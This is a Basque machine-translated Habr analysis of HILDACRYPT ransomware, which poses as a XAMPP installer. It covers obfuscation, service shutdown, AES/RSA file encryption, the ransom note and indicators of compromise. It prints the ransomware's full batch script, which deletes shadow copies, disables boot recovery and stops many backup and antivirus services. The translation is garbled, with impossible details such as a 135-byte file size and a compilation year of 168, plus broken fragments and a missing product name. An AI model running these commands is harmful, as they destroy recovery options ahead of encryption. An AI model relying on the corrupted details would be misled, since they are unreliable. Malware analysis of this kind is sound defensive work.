Kaixo, Habr! Berriro ere, Ransomware kategoriako malwarearen azken bertsioei buruz ari gara. HILDACRYPT ransomware berri bat da, 2019ko abuztuan aurkitutako Hilda familiako kide batek, softwarea banatzeko erabili zen Netflix marrazki bizidunaren izena du. Gaur egun ransomware birus eguneratu honen ezaugarri teknikoak ezagutzen ari gara.
Hilda ransomwarearen lehen bertsioan, Youtuben argitaratutako baten esteka marrazki bizidunen seriea erreskate gutunean jasota zegoen. HILDACRYPT XAMPP instalatzaile legitimoa da, MariaDB, PHP eta Perl barne dituen Apache banaketa erraz instalatzeko. Aldi berean, kriptografia-blokeatzaileak beste fitxategi-izen bat du - xamp. Gainera, ransomware fitxategiak ez du sinadura elektronikorik.
Analisi Estatikoa
Ransomware MS Windows-erako idatzitako PE32 .NET fitxategi batean dago. Bere tamaina 135 byte da. Programaren kodea eta defendatzaile programaren kodea C#-n idatzita daude. Konpilazio data eta ordu-zigiluen arabera, bitarra 168ko irailaren 14an sortu zen.
Detect It Easy-ren arabera, ransomwarea Confuser eta ConfuserEx erabiliz artxibatzen da, baina ezkutatzaile hauek lehen bezalakoak dira, ConfuserEx bakarrik da Confuser-en ondorengoa, beraz, haien kode sinadurak antzekoak dira.
HILDACRYPT ConfuserEx-ekin paketatzen da.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Eraso bektorea
Seguruenik, ransomwarea web programazio guneetako batean aurkitu zen, XAMPP programa legitimo gisa maskaratuta.
Infekzio-kate osoa ikus daiteke .
Lausotzea
Ransomware kateak enkriptatutako forman gordetzen dira. Abian jartzen denean, HILDACRYPT-ek deszifratzen ditu Base64 eta AES-256-CBC erabiliz.
Instalazio-
Lehenik eta behin, ransomwareak %AppDataRoaming%-n karpeta bat sortzen du eta bertan GUID (Globally Unique Identifier) parametroa ausaz sortzen da. Kokapen honetan bat fitxategi bat gehituz gero, ransomware birusak cmd.exe erabiliz abiarazten du:
cmd.exe /c JKfgkgj3hjgfhjka.bat & irten
Ondoren, batch script bat exekutatzen hasten da sistemaren eginbideak edo zerbitzuak desgaitzeko.
Itzal kopiak suntsitzen, SQL zerbitzaria, babeskopia eta birusen aurkako irtenbideak desgaitzen dituzten komandoen zerrenda luze bat dauka scriptak.
Adibidez, arrakastarik gabe saiatzen da Acronis Backup zerbitzuak gelditzen. Horrez gain, honako saltzaile hauen babeskopia sistemei eta birusen aurkako soluzioei eraso egiten die: Veeam, Sophos, Kaspersky, McAfee eta beste.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Goian aipatutako zerbitzuak eta prozesuak desgaituta daudenean, kriptografia-blokeatzaileak exekutatzen diren prozesu guztiei buruzko informazioa biltzen du zeregin-zerrenda komandoa erabiliz, beharrezkoak diren zerbitzu guztiak behera daudela ziurtatzeko.
ataza-zerrenda v/fo csv
Komando honek exekutatzen diren prozesuen zerrenda zehatza bistaratzen du, eta horien elementuak "," ikurraren bidez bereizten dira.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Egiaztapen honen ondoren, ransomwareak enkriptazio-prozesua hasten du.
enkriptatze
Fitxategien enkriptatzea
HILDACRYPT disko gogorretan aurkitutako eduki guztiak zeharkatzen ditu, Recycle.Bin eta Reference AssembliesMicrosoft karpetak izan ezik. Azken honek ransomwarearen funtzionamenduan eragina izan dezaketen .Net aplikazioetarako dll, pdb eta abar fitxategi kritikoak ditu. Enkriptatutako fitxategiak bilatzeko, luzapenen zerrenda hau erabiltzen da:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomwareak AES-256-CBC algoritmoa erabiltzen du erabiltzaileen fitxategiak enkriptatzeko. Gakoaren tamaina 256 bitekoa da eta hasierako bektorea (IV) tamaina 16 bytekoa.
Hurrengo pantaila-argazkian, byte_2 eta byte_1 balioak ausaz lortu ziren GetBytes() erabiliz.
gakoa
ETA
Enkriptatutako fitxategiak HCY! luzapena du.. Hau enkriptatutako fitxategi baten adibidea da. Goian aipatutako gakoa eta IV fitxategi honetarako sortu dira.
Gako enkriptatzea
Kriptoblokeatzaileak sortutako AES gakoa enkriptatutako fitxategi batean gordetzen du. Enkriptatutako fitxategiaren lehen zatiak HILDACRYPT, KEY, IV, FileLen XML formatuan bezalako datuak dituen goiburua du, eta itxura hau dauka:
AES eta IV gakoen enkriptatzea RSA-2048 erabiliz egiten da, eta kodetzea Base64 erabiliz. RSA gako publikoa kriptolocker-aren gorputzean gordetzen da XML formatuan enkriptatutako kateetako batean.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
RSA gako publikoa AES fitxategiaren gakoa enkriptatzeko erabiltzen da. RSA gako publikoa Base64 kodetuta dago eta 65537ko modulu eta erakusle publiko batez osatuta dago. Deszifratzeak RSA gako pribatua behar du, erasotzaileak duen.
RSA enkriptatu ondoren, AES gakoa enkriptatutako fitxategian gordetako Base64 erabiliz kodetzen da.
Erreskate mezua
Enkriptatzea amaitutakoan, HILDACRYPT-ek html fitxategia fitxategiak enkriptatu dituen karpetan idazten du. Ransomware jakinarazpenak bi helbide elektroniko ditu, non biktima erasotzailearekin harremanetan jartzeko.
Estortsio-oharrak "No loli is safe;)" lerroa ere badu - Japonian debekatuta dauden neska txikien itxura duten anime eta manga pertsonaien erreferentzia.
Irteera
HILDACRYPT, ransomware familia berriak, bertsio berri bat kaleratu du. Zifratze-ereduak biktimak ransomwareak enkriptatutako fitxategiak deszifratzea eragozten du. Cryptolockerrek babes-metodo aktiboak erabiltzen ditu babeskopia-sistemekin eta birusen aurkako soluzioekin lotutako babes-zerbitzuak desgaitzeko. HILDACRYPT-en egilea Netflix-en erakusten den Hilda animaziozko seriearen zalea da, eta programaren aurreko bertsioaren erosketa gutunean jasota zegoen trailerrako esteka.
Normalean, и zure ordenagailua HILDACRYPT ransomwaretik babestu dezake, eta hornitzaileek bezeroak babesteko gaitasuna dute. . Babesa irtenbide horiek barne hartzen dutenez bermatzen da babeskopia ez ezik, gure segurtasun sistema integratua ere barne hartzen du - Ikaskuntza automatikoko eredu batek bultzatuta eta jokabide heuristikoetan oinarrituta, zero-day ransomwarearen mehatxuari aurre egiteko gai den teknologia.
Konpromisoaren adierazleak
HCY fitxategiaren luzapena!
HILDACRYPTReadMe.html
xamp.exe "p" letra batekin eta sinadura digitalik gabe
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Iturria: www.habr.com